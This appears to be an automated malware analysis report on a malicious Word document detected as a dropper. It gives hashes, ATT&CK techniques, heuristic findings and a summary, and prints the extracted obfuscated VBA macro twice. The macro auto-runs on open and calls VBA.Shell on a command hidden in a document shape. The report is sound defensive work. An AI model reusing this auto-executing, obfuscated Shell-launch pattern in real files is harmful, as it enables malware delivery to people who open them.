Office (OLE) malware analysis — malicious · f07be30c7f715831

MALICIOUS

Office (OLE)

77.4 KB Created: 2018-11-09 13:06:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 6c13fb01cfecb806ad9072ee3aa09300 SHA-1: 7a1b87e056674aaf3cc21aefb8e2f9b211a49dc7 SHA-256: f07be30c7f7158311ebad7481f2a5cc2e3f2a97a80b68882f727a0ece5356668

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The file contains a VBA macro that triggers on document open, utilizing the Shell() function to execute a command. This command appears to construct and run a PowerShell command, indicated by the 'SC_STR_POWERSHELL' heuristic and the presence of 'cmd.exe /c' in the document body. The macro's intent is to download and execute a second-stage payload, as suggested by the 'Doc.Dropper.Prince-6923163-0' ClamAV detection and the 'OLE_VBA_SHELL' heuristic. The specific command construction is obfuscated but points to dynamic payload retrieval.

Heuristics 8

ClamAV: Doc.Dropper.Prince-6923163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Prince-6923163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

   FormatNumber DnrVa + UURdi + pZSnq + kdGwCi * nPFjV + OaCkz + Ibjifd + lpJwP
TmwpHkQustK = VBA.Shell(Shapes(jDPSK + tAvQCib + 1 + iCPFWD + wZvjlf).TextFrame.TextRange.Text + IAAiq + dRPpb, PnUoiCsciGL)
End Function

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2355 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2355 bytes
SHA-256: `88303abffa1d585958bef878663f7524a43865a1038f758a4be0c283cbf45f34`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "njoktEkEwprpu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function GEUciTEPRiz() On Error Resume Next Const PnUoiCsciGL = 690563030 - 690563030 TimeValue (OdfSu + itYop + rvCUim + FjlGBQ / (CIpXOt + vOQou)) FormatNumber qUNsIQ + VYYuN * (QUnVj + rEwzn + nwrsuO + omcdC - (DAuCPz + XiPVjf)) TimeValue DwsXu + mYhXbb + PviNii + wQdLQ - (XoYuk + fqXBUJ) FormatNumber (wvJvHk + UmpOo + UPjnoT + iJEvb / dwKdR + ErKSRH + PanoqT + iEVGWJ / YwprOT + GMKJXZ - DKzRjL + cuUNb + jZbEHH + jvUaDn) FormatNumber DnrVa + UURdi + pZSnq + kdGwCi * nPFjV + OaCkz + Ibjifd + lpJwP TmwpHkQustK = VBA.Shell(Shapes(jDPSK + tAvQCib + 1 + iCPFWD + wZvjlf).TextFrame.TextRange.Text + IAAiq + dRPpb, PnUoiCsciGL) End Function Private Sub Document_open() On Error Resume Next TimeValue TzDtls + cmQrd + LKZfz + ZbEwo * jQzLOj + sUuoh / (DAsVS + iQjGh + FuwXEP + PJCbE) FormatNumber NQBiJQ + TZHQEO + jbOczt + qJahE * (HzGFqH + mwTsC) TimeValue qUltKr + VidCq + kFEIU + Luhbu / vwloGN + cFjbv - (VsmmRW + AMVXMH + PlwIt + MOujhb) FormatNumber (wzEcau + SsRksL) FormatDateTime (vMosp + ffTRFc - (SXGaw + lsVSC + wLumH + ZIYOi - isczb + oAOllP)) TimeValue (uvkIX + vQumO + odLVv + HACMzU / LHPIcN + BSGOIu + jKKYp + wpWRsw / wwLiz + aLvfH) FormatDateTime VNJLJ + mOjQVU / VOwHqG + iZcAoH + WUwCwj + JtCci / (aSbIS + AdNsjE) FormatDateTime (YcGCL + UKmpZz / jnMok + wAliDf + GOwzwj + ZVOYrF - (UKvjz + LkBpmm + wKmzCW + iGMost / hLZoz + wbqqvD)) FormatNumber wKTnXN + itOhu / (WPKtUt + Xbfit - (jVOIZM + Iwcsb + riAklW + DdTDX + (BYSWi + uritQl + ViYZnS + pCaWq))) FormatDateTime YkhQWr + uOjGl + FTzJST + oWVPf / (SMBZoD + iKfBpL / (vAiqwd + KpCSm + OsCPSl + ZwtosD)) FormatNumber (vnzUG + NonfR - VIXwH + FjmHQ) * (EbawGt + umLOCE + fiADOk + iNRZu) GEUciTEPRiz FormatNumber ObMsi + zkqZW + BEHOfK + RzuIS / jridk + KaPjDA + ObpqM + iNjNTI * FBJQT + ujuJT + GdLAl + DNbvZ FormatDateTime nccDiE + zMUAQJ * AnLNB + ufNwtd / aCEBnh + bXDPC TimeValue VVXzM + Ybqrn + alWkw + fIBEH * RtTtl + DGQiaT + UfvjVG + vopop / (hqmQN + OzjTh) TimeValue (LohsvL + kilkc) End Sub

SHA-256: 88303abffa1d585958bef878663f7524a43865a1038f758a4be0c283cbf45f34

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "njoktEkEwprpu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GEUciTEPRiz()
On Error Resume Next
Const PnUoiCsciGL = 690563030 - 690563030
   TimeValue (OdfSu + itYop + rvCUim + FjlGBQ / (CIpXOt + vOQou))
   FormatNumber qUNsIQ + VYYuN * (QUnVj + rEwzn + nwrsuO + omcdC - (DAuCPz + XiPVjf))
   TimeValue DwsXu + mYhXbb + PviNii + wQdLQ - (XoYuk + fqXBUJ)
   FormatNumber (wvJvHk + UmpOo + UPjnoT + iJEvb / dwKdR + ErKSRH + PanoqT + iEVGWJ / YwprOT + GMKJXZ - DKzRjL + cuUNb + jZbEHH + jvUaDn)
   FormatNumber DnrVa + UURdi + pZSnq + kdGwCi * nPFjV + OaCkz + Ibjifd + lpJwP
TmwpHkQustK = VBA.Shell(Shapes(jDPSK + tAvQCib + 1 + iCPFWD + wZvjlf).TextFrame.TextRange.Text + IAAiq + dRPpb, PnUoiCsciGL)
End Function
Private Sub Document_open()
On Error Resume Next
   TimeValue TzDtls + cmQrd + LKZfz + ZbEwo * jQzLOj + sUuoh / (DAsVS + iQjGh + FuwXEP + PJCbE)
   FormatNumber NQBiJQ + TZHQEO + jbOczt + qJahE * (HzGFqH + mwTsC)
   TimeValue qUltKr + VidCq + kFEIU + Luhbu / vwloGN + cFjbv - (VsmmRW + AMVXMH + PlwIt + MOujhb)
   FormatNumber (wzEcau + SsRksL)
   FormatDateTime (vMosp + ffTRFc - (SXGaw + lsVSC + wLumH + ZIYOi - isczb + oAOllP))
   TimeValue (uvkIX + vQumO + odLVv + HACMzU / LHPIcN + BSGOIu + jKKYp + wpWRsw / wwLiz + aLvfH)
   FormatDateTime VNJLJ + mOjQVU / VOwHqG + iZcAoH + WUwCwj + JtCci / (aSbIS + AdNsjE)
   FormatDateTime (YcGCL + UKmpZz / jnMok + wAliDf + GOwzwj + ZVOYrF - (UKvjz + LkBpmm + wKmzCW + iGMost / hLZoz + wbqqvD))
   FormatNumber wKTnXN + itOhu / (WPKtUt + Xbfit - (jVOIZM + Iwcsb + riAklW + DdTDX + (BYSWi + uritQl + ViYZnS + pCaWq)))
   FormatDateTime YkhQWr + uOjGl + FTzJST + oWVPf / (SMBZoD + iKfBpL / (vAiqwd + KpCSm + OsCPSl + ZwtosD))
   FormatNumber (vnzUG + NonfR - VIXwH + FjmHQ) * (EbawGt + umLOCE + fiADOk + iNRZu)
GEUciTEPRiz
   FormatNumber ObMsi + zkqZW + BEHOfK + RzuIS / jridk + KaPjDA + ObpqM + iNjNTI * FBJQT + ujuJT + GdLAl + DNbvZ
   FormatDateTime nccDiE + zMUAQJ * AnLNB + ufNwtd / aCEBnh + bXDPC
   TimeValue VVXzM + Ybqrn + alWkw + fIBEH * RtTtl + DGQiaT + UfvjVG + vopop / (hqmQN + OzjTh)
   TimeValue (LohsvL + kilkc)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.